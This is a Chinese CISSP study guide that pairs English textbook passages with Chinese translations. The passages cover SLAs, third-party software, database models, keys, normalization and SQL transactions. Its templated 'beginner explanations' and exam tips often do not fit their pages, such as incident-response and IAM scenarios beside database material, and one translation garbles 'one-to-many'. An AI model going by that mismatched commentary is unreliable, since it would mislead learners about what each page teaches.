可用性:需要时能用,且性能可接受

可用性关注中断、故障、DoS、备份和冗余。

教材原文段落

System uptime (as a percentage of overall operating time) Maximum consecutive downtime (in seconds/minutes/and so on) Peak load Average load Responsibility for diagnostics Failover time (if redundancy is in place) Service-level agreements also commonly include financial and other contractual remedies that kick in if the agreement is not maintained. In these situations, the service provider and customer both carefully monitor performance metrics to ensure compliance with the SLA. For example, if a critical circuit is down for more than 15 minutes, the service provider might be required to waive all charges on that circuit for one week.

Third-Party Software Acquisition Most of the software used by enterprises is not developed internally but purchased from third-party vendors. Commercial off-the-shelf (COTS) software is purchased to run on servers managed by the organization, either on-premises or in an IaaS environment. Other software is purchased and delivered over the Internet through web browsers, in a software-as-a-service (SaaS) approach. Still more software is created and maintained by community-based open-source software (OSS) projects. These open-source projects are freely available for anyone to download and use, either directly or as a component of a larger system.

In fact, many COTS software packages incorporate open-source code. Most organizations use a combination of commercial and open-source, depending on business needs and software availability. For example, organizations may approach email service in two ways. They might purchase physical or virtual servers and then install email software, such as Microsoft Exchange, on them. In that case, the organization purchases Exchange licenses from Microsoft and then installs, configures, and manages the email environment. As an alternative, the organization might choose to outsource email entirely to Google, Microsoft, or another vendor.

Users then access email through their web browsers or other tools, interacting directly with the email servers

中文直译 / 整理

系统正常运行时间(占总运行时间的百分比) 最大连续停机时间(以秒/分钟等为单位) 峰值负载 平均负载 诊断责任 故障切换时间(如有冗余) 服务级别协议通常还包括在协议未得到遵守时生效的财务及其他合同补救措施。 在这种情况下,服务提供商和客户都会仔细监控性能指标,以确保遵守SLA。 例如,如果关键电路中断超过15分钟,服务提供商可能被要求免除该电路一周 的所有费用。 第三方软件采购 企业使用的大多数软件并非内部开发,而是从第三方供应商购买的。 商用现成 软件(COTS)用于在组织管理的服务器上运行,这些服务器可以是本地部署的, 也可以是IaaS环境中的。 其他软件则通过网页浏览器以软件即服务(SaaS)的 方式通过互联网购买和交付。 还有更多软件由基于社区的开源软件(OSS)项 目创建和维护。 这些开源项目可供任何人免费下载和使用,无论是直接使用, 还是作为更大系统的一个组件。 事实上,许多COTS软件包都集成了开源代码。 大多数组织根据业务需求和软件可用性,结合使用商业软件和开源软件。 例如,组织在电子邮件服务方面可能采取两种方式。

它们可以购买物理或虚 拟服务器,然后在其上安装电子邮件软件,例如Microsoft Exchange。 在 这种情况下,组织从微软购买Exchange许可证,然后安装、配置和管理电 子邮件环境。 作为另一种选择,该组织可以选择将电子邮件完全外包给谷歌、微软或其他供应商。 用户随后通过其网页浏览器或其他工具访问电子邮件,直接与邮件服务器交互

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:可用性关注中断、故障、DoS、备份和冗余。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

可用性:可用性保证授权用户需要时能及时使用系统和数据。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“可用性:需要时能用,且性能可接受”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
可用性 可用性保证授权用户需要时能及时使用系统和数据。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 45 / PDF P1368

第 1368 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

managed by the vendor. In this case, the organization is only responsible for creating accounts and managing some application-level settings. In either case, security is of paramount concern. When the organization purchases and configures software itself, security professionals must understand the proper configuration of that software to meet security objectives. They also must remain vigilant about security bulletins and patches that correct newly discovered vulnerabilities. Failure to meet these obligations may result in an insecure environment. In the case of SaaS environments, most security responsibility rests with the vendor, but the organization's security staff isn't off the hook.

Although they might not be responsible for as much configuration, they now take on responsibility for monitoring the vendor's security. This may include audits, assessments, vulnerability scans, and other measures designed to verify that the vendor maintains proper controls. The organization may also retain full or partial responsibility for legal compliance obligations, depending on the nature of the regulation and the agreement that is in place with the service provider. Whenever an organization acquires any type of software, be it COTS or OSS, run on-premises or in the cloud, that software should be tested for security vulnerabilities.

Organizations may conduct their own testing, rely on the results of tests provided by vendors, and/or hire third parties to conduct independent testing. Establishing Databases and Data Warehousing Almost every modern organization maintains some sort of database that contains information critical to operations—be it customer contact information, order-tracking data, human resource and benefits information, or sensitive trade secrets. It's likely that many of these databases contain personal information that users hold secret, such as credit card usage activity, travel habits, grocery store purchases, and telephone records.

Because of the growing reliance on database systems, information security professionals must ensure that adequate security controls exist to protect them against unauthorized access, tampering, or destruction of data.

中文直译 / 整理

由供应商管理。 在这种情况下,该组织仅负责创建账户和管理某些应用程序级别 的设置。 无论哪种情况,安全都是首要关注的问题。 当组织自行购买和配置软件时, 安全专业人员必须了解如何正确配置该软件以实现安全目标。 他们还必须密 切关注安全公告和补丁,以修复新发现的漏洞。 未能履行这些义务可能导致 环境不安全。 在SaaS环境中,大部分安全责任由供应商承担,但组织的安全团队并非完全 免责。 尽管他们可能无需负责大量配置工作,但他们现在需要承担监控供应商 安全的责任。 这可能包括审计、评估、漏洞扫描以及其他旨在验证供应商是否 维持适当控制措施的措施。 根据法规的性质以及与服务提供商达成的协议,组 织可能仍需完全或部分承担法律合规义务。 无论组织获取何种类型的软件,无论是商业现货软件还是开源软件, 无论是在本地运行还是在云中运行,都应对该软件进行安全漏洞测试。 组 织可以自行开展测试,依赖供应商提供的测试结果,或聘请第三方进行独 立测试。 建立数据库和数据仓库 几乎每个现代组织都维护着某种包含对运营至关重要的信息的数据库——无论 是客户联系信息、订单跟踪数据、人力资源和福利信息,还是敏感的商业机密。

这些数据库中很可能包含用户视为机密的个人信息,例如信用卡使用活动、旅 行习惯、超市购物记录和电话记录。 由于对数据库系统的依赖日益增加,信息 安全专业人员必须确保存在充分的安全控制措施,以防止未经授权的访问、篡 改或数据破坏。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

审计:审计记录主体行为,用于追责、复盘和取证。

程序:程序是一步一步怎么做。

漏洞扫描:漏洞扫描用工具找已知弱点。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1368 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

没有日志和身份绑定,就很难问责。

Step-by-step、SOP 常对应 procedure。

扫描发现弱点,不等于已经成功利用。

审计题关注独立性、证据、范围和报告。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
审计 审计记录主体行为,用于追责、复盘和取证。
程序 程序是一步一步怎么做。
漏洞扫描 漏洞扫描用工具找已知弱点。
审计 审计检查控制是否存在、是否有效、是否符合要求。
学习单元 46 / PDF P1369

第 1369 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

In the following sections, we'll discuss database management system (DBMS) architecture, including the various types of DBMSs and their features. Then, we'll discuss database security considerations, including polyinstantiation, Open Database Connectivity (ODBC), aggregation, inference, and machine learning. Database Management System Architecture Although a variety of DBMS architectures are available today, the vast majority of contemporary systems implement a technology known as relational database management systems (RDBMSs). For this reason, the following sections focus primarily on relational databases.

However, first we'll discuss two other important DBMS architectures: hierarchical and distributed. Hierarchical and Distributed Databases A hierarchical data model combines records and fields that are related in a logical tree structure. This results in a one-to-many data model, where each node may have zero, one, or many children but only one parent. An example of a hierarchical data model appears in Figure 20.9. FIGURE 20.9 Hierarchical data model The hierarchical model in Figure 20.9 is a corporate organization chart. Notice that the one-to-many data model holds true in this example. Each employee has only one manager (the one in one-to-many), but each manager

中文直译 / 整理

在以下章节中,我们将讨论数据库管理系统(DBMS)的架构,包括各种类型 的DBMS及其功能。 然后,我们将讨论数据库安全考虑因素,包括多实例化、 开放数据库互连(ODBC)、聚合、推断和机器学习。 数据库管理系统架构 尽管如今有多种数据库管理系统架构可供选择,但绝大多数现代系统都采 用了一种称为关系型数据库管理系统(RDBMS)的技术。 因此,以下章节 主要关注关系型数据库。 然而,首先我们将讨论另外两种重要的数据库管 理系统架构:层次型和分布式。 层次型和分布式数据库 层次型数据模型将以逻辑树结构关联的记录和字段组合在一起。 这形成了一 种一对多的数据模型,其中每个节点可以有零个、一个或多个子节点,但只 能有一个父节点。 层次型数据模型的一个示例如图20.9所示。 图20.9 层次型数据模型 层次模型在图20.9中是一个企业组织结构图。 请注意,在此示例中,一对一多 数据模型成立。 每位员工只有一位经理(一对一多中的一),但每位经理

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

强制访问控制 MAC:MAC 由系统根据标签和级别强制决定访问。

日志:日志记录系统和用户活动,用于监控、审计和调查。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1369 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

日志要保护完整性、时间同步和访问控制。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 47 / PDF P1370

第 1370 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

may have one or more (the many) employees. Other examples of hierarchical data models include the NCAA March Madness bracket system and the hierarchical distribution of Domain Name System (DNS) records used on the Internet. Hierarchical databases store data in this type of hierarchical fashion and are useful for specialized applications that fit the model. For example, biologists might use a hierarchical database to store data on specimens according to the kingdom/phylum/class/order/family/genus/species hierarchical model used in that field. The distributed data model has data stored in more than one database, but those databases are logically connected.

The user perceives the database as a single entity, even though it consists of numerous parts interconnected over a network. Each field can have numerous children as well as numerous parents. Thus, the data mapping relationship for distributed databases is many-to-many. Relational Databases A relational database consists of flat two-dimensional tables made up of rows and columns. In fact, each table looks similar to a spreadsheet file. The row and column structure provides for one-to-one data mapping relationships. The main building block of the relational database is the table (also known as a relation). Each table contains a set of related records.

For example, a sales database might contain the following tables: Customers table that contains contact information for all the organization's clients Sales Reps table that contains identity information on the organization's sales force Orders table that contains records of orders placed by each customer

中文直译 / 整理

可能有一位或多位(一对一多中的多)员工。 层次数据模型的其他示例包括 NCAA三月疯狂赛程系统以及互联网上使用的域名系统(DNS)记录的层次化 分发。 层次数据库以这种层次方式存储数据,适用于符合该模型的专用应用。 例如,生物学家可能使用层次数据库,根据该领域中使用的界/门/纲/目/科/属/ 种层次模型来存储标本数据。 分布式数据模型将数据存储在多个数据库中,但这些数据库在逻辑上是相连的。 用户将数据库视为一个单一实体,尽管它由通过网络互连的多个部分组成。 每 个字段可以有多个子节点和多个父节点。 因此,分布式数据库的数据映射关系 是多对多的。 关系型数据库 关系型数据库由由行和列组成的扁平二维表构成。 实际上,每个表看起来都类 似于电子表格文件。 行和列的结构提供了一对一的数据映射关系。 关系型数据 库的主要构建块是表(也称为关系)。 每个表包含一组相关的记录。 例如,一 个销售数据库可能包含以下表: 包含组织所有客户联系信息的客户表 包含组织销售团队身份信息的销售代表表 包含每位客户订单记录的订单表

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

入侵防御系统 IPS:IPS 可检测并主动阻断恶意流量。

身份:身份是主体在系统中的标识。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1370 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

IPS 放在线路中,误报可能影响可用性。

身份管理题要区分识别、认证、授权、审计。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 48 / PDF P1371

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Object-Oriented Programming and Databases Object-relational databases combine relational databases with the power of object-oriented programming. True object-oriented databases (OODBs) benefit from ease of code reuse, ease of troubleshooting analysis, and reduced overall maintenance. OODBs are also better suited than other types of databases for supporting complex applications involving multimedia, CAD, video, graphics, and expert systems. Each table contains a number of attributes, or fields. Each attribute corresponds to a column in the table. For example, the Customers table might contain columns for company name, address, city, state, zip code, and telephone number.

Each customer would have their own record, or tuple, represented by a row in the table. The number of rows in the relation is referred to as cardinality, and the number of columns is the degree. The domain of an attribute is the set of allowable values that the attribute can take. Figure 20.10 shows an example of a Customers table from a relational database. FIGURE 20.10 Customers table from a relational database In this example, the table has a cardinality of 3 (corresponding to the three rows in the table) and a degree of 8 (corresponding to the eight columns).

It's common for the cardinality of a table to change during the course of normal business, such as when a sales rep adds new customers. The degree of a table normally does not change frequently and usually requires database administrator intervention.

中文直译 / 整理

面向对象编程与数据库 对象关系数据库将关系型数据库与面向对象编程的强大功能相结合。 真正 的面向对象数据库(OODBs)得益于代码重用的便捷性、故障排查分析的 简易性以及整体维护成本的降低。 与其他类型的数据库相比,OODB 更适 合支持涉及多媒体、CAD、视频、图形和专家系统的复杂应用程序。 每个表包含若干属性,或字段。 每个属性对应表中的一列。 例如,客户表可能 包含公司名称、地址、城市、州、邮政编码和电话号码等列。 每个客户都有自 己的记录,或元组,在表中以一行表示。 关系中的行数称为基数,列数称为度。 属性的域是该属性可取的允许值的集合。 图 20.10展示了关系数据库中客户表的 一个示例。 图 20.10 关系数据库中的客户表 在此示例中,表的基数为 3(对应表中的三行),度为 8(对应八列)。 在正 常业务过程中,表的基数通常会发生变化,例如销售代表添加新客户时。 而表 的度通常不会频繁更改,通常需要数据库管理员干预。

小白解释

场景先行:你是公司的安全负责人,正在读第 1371 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

程序:程序是一步一步怎么做。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
学习单元 49 / PDF P1372

第 1372 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

To remember the concept of cardinality, think of a deck of cards on a desk, with each card (the first four letters of cardinality) being a row. To remember the concept of degree, think of a wall thermometer as a column (in other words, the temperature in degrees as measured on a thermometer). Relationships between the tables are defined to identify related records. In this example, a relationship exists between the Customers table and the Sales Reps table because each customer is assigned a sales representative and each sales representative is assigned to one or more customers. This relationship is reflected by the Sales Rep field/column in the Customers table, shown in Figure 20.10.

The values in this column refer to a Sales Rep ID field contained in the Sales Rep table (not shown). Additionally, a relationship would probably exist between the Customers table and the Orders table because each order must be associated with a customer, and each customer is associated with one or more product orders. The Orders table (not shown) would likely contain a Customer field that contained one of the Customer ID values shown in Figure 20.10. Records are identified using a variety of keys. Quite simply, keys are a subset of the fields of a table and are used to uniquely identify records. They are also used to join tables when you wish to cross-reference information.

You should be familiar with four types of keys: Candidate Keys A candidate key is a subset of attributes that can be used to uniquely identify any record in a table. No two records in the same table will ever contain the same values for all attributes composing a candidate key. Each table may have one or more candidate keys, which are chosen from column headings. Primary Keys A primary key is selected from the set of candidate keys for a table to be used to uniquely identify the records in a table. Each table has only one primary key, selected by the database designer from the set of candidate keys.

The RDBMS enforces the uniqueness of primary keys by disallowing the insertion of multiple records with the same primary key. In the Customers table shown in Figure 20.10, the Company ID would likely be the primary key.

中文直译 / 整理

要记住基数的概念,可以想象桌面上的一副扑克牌,每张牌( cardinality 的前四个字母)代表一行。 要记住度的概念,可以想象一个墙上 的温度计作为一列(换句话说,温度是以温度计上测量的度数表示的)。 表之间的关系用于识别相关记录。 在此示例中,由于每个客户都被分配了一名 销售代表,且每位销售代表被分配给一个或多个客户,因此在客户表和销售代 表表之间存在关系。 此关系通过客户表中的“销售代表”字段/列反映出来,如 图20.10所示。 此列中的值指向销售代表表中包含的“销售代表ID”字段(未 显示)。 此外,客户表和订单表之间可能也存在关系,因为每笔订单都必须与 一位客户相关联,而每位客户又与一个或多个产品订单相关联。 订单表(未显 示)可能包含一个“客户”字段,其中包含图20.10中所示的某个客户ID值。 记录使用多种键进行标识。 简单来说,键是表中字段的子集,用于唯一标识记 录。 它们还用于在需要交叉引用信息时连接表。 您应熟悉四种类型的键: 候选键 一个候选键是由一组属性构成的子集,可用于唯一标识表中的任何记录。 同一表中的任何两条记录都不可能在组成候选键的所有属性上具有相同的值。

每 个表可能有一个或多个候选键,这些候选键从列标题中选择。 主键 A 主键是从表的候选键集合中选出的,用于唯一标识表中的记录。 每个表 只有一个主键,由数据库设计者从候选键集合中选择。 关系型数据库管理系统通 过禁止插入具有相同主键的多条记录来强制执行主键的唯一性。 在图20.10所示 的客户表中,公司ID很可能是主键。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

入侵防御系统 IPS:IPS 可检测并主动阻断恶意流量。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1372 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

网络题先定位层次,再判断协议、设备或攻击位置。

IPS 放在线路中,误报可能影响可用性。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
学习单元 50 / PDF P1373

完整性:数据要正确、可信、未被乱改

完整性不只是防黑客篡改,也包括防授权用户误操作。

教材原文段落

Alternate Keys Any candidate key that is not selected as the primary key is referred to as an alternate key. For example, if the telephone number is unique to a customer in Figure 20.10, then Telephone could be considered a candidate key. Since Company ID was selected as the primary key, then Telephone is an alternate key. Foreign Keys A foreign key is used to enforce relationships between two tables, also known as referential integrity. Referential integrity ensures that if one table contains a foreign key, it corresponds to a still-existing primary key in the other table in the relationship.

It makes certain that no record/tuple/row contains a reference to a primary key of a nonexistent record/tuple/row. In the example described earlier, the Sales Rep field shown in Figure 20.10 is a foreign key referencing the primary key of the Sales Reps table. All relational databases use a standard language, SQL, to provide users with a consistent interface for the storage, retrieval, and modification of data and for administrative control of the DBMS. Each DBMS vendor implements a slightly different version of SQL (like Microsoft's Transact-SQL and Oracle's PL/SQL), but all support a core feature set. SQL's primary security feature is its granularity of authorization.

This means that SQL allows you to set permissions at a very fine level of detail. You can limit user access by table, row, column, or even by individual cell in some cases.

中文直译 / 整理

备用键 未被选为主键的任何候选键都称为备用键。 例如,如果在图20.10中,电 话号码对每个客户都是唯一的,那么电话号码可以被视为候选键。 由于公司ID被 选为主键,因此电话号码就是备用键。 外键 A 外键 用于强制两个表之间的关系,也称为 参照完整性。 参照完整性确 保如果一个表包含外键,则该外键必须对应于关系中另一表中仍然存在的主键。 它保证没有任何记录/元组/行包含对不存在的记录/元组/行的主键的引用。 在前 面描述的示例中,图 20.10 中显示的销售代表字段是一个外键,引用了销售代表 表的主键。 所有关系型数据库都使用标准语言 SQL,为用户提供一致的接口,用于数据的 存储、检索和修改,以及对 DBMS 的管理控制。 每个 DBMS 供应商都实现了 略有不同的 SQL 版本(如 Microsoft 的 Transact‑SQL 和 Oracle 的 PL/SQL),但都支持一组核心功能。 SQL 的主要安全特性是其授权的精细粒 度。 这意味着 SQL 允许您在非常细致的级别上设置权限。 您可以按表、行、列, 甚至在某些情况下按单个单元格来限制用户访问。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:完整性不只是防黑客篡改,也包括防授权用户误操作。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

授权:授权是认证之后决定你能访问什么、能做什么。

NIST:NIST 提供美国常用安全标准、框架和指南。

标准:标准给出必须满足的最低要求。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“完整性:数据要正确、可信、未被乱改”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

认证成功不等于什么都能做;权限仍要单独授权。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Minimum level、mandatory requirement 常对应 standard。

IPS 放在线路中,误报可能影响可用性。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
授权 授权是认证之后决定你能访问什么、能做什么。
NIST NIST 提供美国常用安全标准、框架和指南。
标准 标准给出必须满足的最低要求。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
学习单元 51 / PDF P1374

完整性:数据要正确、可信、未被乱改

完整性不只是防黑客篡改,也包括防授权用户误操作。

教材原文段落

Database Normalization Database developers strive to create well-organized and efficient databases. To assist with this effort, they've defined several levels of database organization known as normal forms. The process of bringing a database table into compliance with normal forms is known as normalization. Although a number of normal forms exist, the three most common are first normal form (1NF), second normal form (2NF), and third normal form (3NF). Each of these forms adds requirements to reduce redundancy in the tables, eliminate misplaced data, and perform a number of other housekeeping tasks.

The normal forms are cumulative— in other words, to be in 2NF, a table must first be 1NF compliant. Before making a table 3NF compliant, it must first be in 2NF. The details of normalizing a database table are beyond the scope of the CISSP exam, but several web resources can help you understand the requirements of the normal forms in greater detail. For example, refer to the article “Database Normalization — in Easy to Understand English”: www.essentialsql.com/database-normalization. SQL provides the complete functionality necessary for administrators, developers, and end users to interact with the database.

In fact, the graphical database interfaces popular today merely wrap some extra bells and whistles around a standard SQL interface to the DBMS. SQL itself is divided into two major components: the Data Definition Language (DDL), which allows for the creation and modification of the database's structure (known as the schema), and the Data Manipulation Language (DML), which allows users to interact with the data contained within that schema. Database Transactions Relational databases support the explicit and implicit use of transactions to ensure data integrity. Each transaction is a discrete set of SQL instructions that should either succeed or fail as a group.

It's not possible for one part of a transaction to succeed while another part fails. Consider the example of a transfer between two accounts at a bank. You might use the following SQL code to first add $250 to account 1001 and then subtract $250 from account 2002:

中文直译 / 整理

数据库规范化 数据库开发人员致力于创建组织良好且高效的数据库。 为了协助这一工作, 他们定义了若干级别的数据库组织,称为 范式。 将数据库表调整为符合范 式的过程称为 规范化。 尽管存在多种规范化形式,但最常见的是第一范式(1NF)、第二范式 (2NF)和第三范式(3NF)。 这些形式每一种都增加了要求,以减少表 中的冗余、消除 misplaced 数据,并执行其他多项维护任务。 这些规范化 形式是累积的——换句话说,要满足 2NF,表必须首先符合 1NF。 在使表 符合 3NF 之前,它必须先满足 2NF。 数据库表规范化的详细内容超出了 CISSP 考试的范围,但一些网络资源可 以帮助您更深入地理解各种规范化形式的要求。 例如,参阅文章《数据库 规范化——用通俗易懂的英语解释》: www.essentialsql.com/database-normalization. SQL 提供了管理员、开发人员和最终用户与数据库交互所需的所有功能。 事实 上,当今流行的图形数据库界面只是在标准 SQL 接口之上封装了一些额外的 功能。 SQL 本身分为两个主要部分:数据定义语言(DDL),用于创建和修改 数据库的结构(称为模式);

以及数据操作语言(DML),用于让用户与该模 式中包含的数据进行交互。 数据库事务 关系型数据库支持显式和隐式使用事务以确保数据完整性。 每个事务是一组离 散的 SQL 指令,必须整体成功或整体失败。 不可能出现事务的一部分成功而 另一部分失败的情况。 以银行中两个账户之间的转账为例,您可能使用以下 SQL 代码首先向账户 1001 存入 250 美元,然后从账户 2002 扣除 250 美元:

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:完整性不只是防黑客篡改,也包括防授权用户误操作。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

NIST:NIST 提供美国常用安全标准、框架和指南。

标准:标准给出必须满足的最低要求。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

